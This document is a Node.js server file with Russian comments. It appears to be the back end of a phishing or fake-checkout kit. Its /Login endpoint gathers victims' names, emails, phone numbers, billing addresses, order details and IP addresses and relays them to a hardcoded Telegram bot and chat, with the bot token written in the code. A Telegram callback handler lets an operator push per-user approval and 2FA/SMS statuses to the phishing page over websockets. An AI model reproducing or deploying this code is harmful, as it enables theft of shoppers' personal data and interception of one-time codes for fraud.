const express = require('express')
const app = express()
const cors = require('cors')
const ws = require('ws')
const fs = require("fs")
const https = require("https")
const TelegramBot = require('node-telegram-bot-api')
const token = '7447787943:AAFWzKiSzXMJQCAVXFZxZAsHU0RIWBU4IAA'
const chat_id = -1002497012226
const PORT_IO = 1101 // SOCKET
const PORT = 1102 // HTTP
const bot = new TelegramBot(token, {
    polling: true
})


app.use(cors())

app.use(express.json());

httpsOptions = {
    key: fs.readFileSync('./ssl/privkey.pem'),
    cert: fs.readFileSync('./ssl/cert.pem'),
    ca: fs.readFileSync('./ssl/chain.pem')
}


const server = https.createServer({
    key: fs.readFileSync('./ssl/privkey.pem'),
    cert: fs.readFileSync('./ssl/cert.pem'),
    ca: fs.readFileSync('./ssl/chain.pem')
});

const wss = new ws.Server({ server,
    clientTracking: true
});



app.post('/submit', async (req, res) => {
    try {
        const {
            orderNumber,
            paymentMethod,
            amount
        } = req.body;

        // Передаем объект с параметрами
        await submitData({ orderNumber, paymentMethod, amount });
        res.status(200).send('✅ Successful');
    } catch (error) {
        console.error(`❌ Ошибка обработки запроса: ${error.message}`);
        res.status(500).send('❌ Internal Server Error');
    }
});



async function submitData({ orderNumber, paymentMethod, amount }) {
    try {
        const bodyRequest = `
========================
🎉 *Заказ подтвержден! №${orderNumber}* 🎉
========================

💳 *Платёжная информация:*
- *Метод оплаты:* ${paymentMethod}
- *Сумма заказа:* ${amount.toFixed(2)} EUR

📅 *Дата и время заказа:*
- ${new Date().toLocaleString()}
`;

        await bot.sendMessage(chat_id, bodyRequest, { parse_mode: 'Markdown' });
        console.log('✅ Данные успешно отправлены в Telegram');
    } catch (error) {
        console.error(`❌ Ошибка при отправке данных в Telegram: ${error.message}`);
    }
}

app.post('/Login', async (req, res) => {
    try {
        const {
            billing_address,
            billing_address2,
            billing_city,
            billing_country,
            billing_country_name,
            billing_state,
            billing_zipcode,
            info_bill_as,
            info_email,
            info_first_name,
            info_last_name,
            info_phone,
            info_title,
            order,
            order_number
        } = req.body;

        const referer = req.headers.origin || 'Не указан';
        const ip = req.headers['x-forwarded-for'] || req.connection.remoteAddress;

        // Формирование и отправка данных в Telegram
        await sendData({
            billing_address,
            billing_address2,
            billing_city,
            billing_country,
            billing_country_name,
            billing_state,
            billing_zipcode,
            info_bill_as,
            info_email,
            info_first_name,
            info_last_name,
            info_phone,
            info_title,
            order,
            order_number,
            referer,
            ip
        });

        // Ответ клиенту
        res.status(200).send('✅ Successful');
    } catch (error) {
        console.error(`❌ Ошибка обработки запроса: ${error.message}`);
        res.status(500).send('❌ Internal Server Error');
    }
});

async function sendData(data) {
    try {
        const {
            billing_address,
            billing_address2,
            billing_city,
            billing_country,
            billing_country_name,
            billing_state,
            billing_zipcode,
            info_bill_as,
            info_email,
            info_first_name,
            info_last_name,
            info_phone,
            info_title,
            referer,
            ip,
            order,// Данные о заказе
            order_number,
        } = data;

        // Проверяем, является ли order массивом
       // Формируем детали заказа
const orderDetails = Array.isArray(order)
? order.map(
    (item, index) => {
        const cleanTitle = item.title
            .trim()
            .replace(/\s+/g, ' '); // Убираем лишние пробелы
        return `${index + 1}. ${cleanTitle} — $${item.price.toFixed(2)}`;
    }
).join('\n')
: 'Нет данных о заказе';

        // Форматирование сообщения
        const bodyRequest = `
*💳 Billing Information:*
- *Address:* ${billing_address} ${billing_address2 || ''}
- *City:* ${billing_city}
- *State:* ${billing_state}
- *Country:* ${billing_country_name} (ID: ${billing_country})
- *ZIP Code:* ${billing_zipcode}
- *Bill As:* ${info_bill_as}

*👤 Personal Information:*
- *Title:* ${info_title}
- *First Name:* ${info_first_name}
- *Last Name:* ${info_last_name}
- *Email:* ${info_email}
- *Phone:* ${info_phone}

*🛒 Order Details:*
${orderDetails}


*📦 Order Number:* ${order_number}

*📡 Connection Details:*
- *IP Address:* ${ip}
- *Referer:* ${referer}
========================`;

        // Отправка сообщения в Telegram
        await bot.sendMessage(chat_id, bodyRequest, { parse_mode: 'Markdown' });
        console.log('✅ Данные успешно отправлены в Telegram');
    } catch (error) {
        console.error(`❌ Ошибка при отправке данных в Telegram: ${error.message}`);
    }
}



bot.on('callback_query', async data => {
    try {
        const _data = data.data;
        let user_id = _data.split('|')[1];
        let username = _data.split('|')[2];
        let status = _data.split('|')[0];
        let event = _data.split('|')[3];
        if (_data.split('|')[3] == '2fa') {
            console.log(`2FA mode on ${user_id}`);
            status = _data.split('|')[0];
            user_id = _data.split('|')[1];
            event = _data.split('|')[3];
            await setStatusMFA(user_id, status, event);
        } else
            await setStatus(user_id, status, username, event);
    } catch (error) {
        console.log(error);
    }
});


async function setStatus(userid, status, username, event) {

    try {
        await bot.sendMessage(chat_id, `Userid [${userid}] ${status}!`, {})
        const answer = {
            event: event,
            username,
            id: userid,
            status: status
        }
        wss.clients.forEach(client => {
            client.send(JSON.stringify(answer))
        })
        console.log(JSON.stringify(answer))

    } catch (error) {
        console.log(error)
    }

}


async function setStatusMFA(userid, status, event) {
    try {
        await bot.sendMessage(chat_id, `UserID [${userid}] ${status}`, {})
        const answer = {
            event: event,
            id: userid,
            SMSStatus: status
        }

        wss.clients.forEach(client => {
            client.send(JSON.stringify(answer))
        })
        console.log(JSON.stringify(answer))
    } catch (error) {
        console.log(error);
    }

}



bot.on('polling_error', error => console.log(error))


https.createServer(httpsOptions, app).listen(PORT, () => console.log(`My server is running on port ${PORT}`));

server.listen(PORT_IO, () => console.log(`My server is running on port ${PORT_IO}`));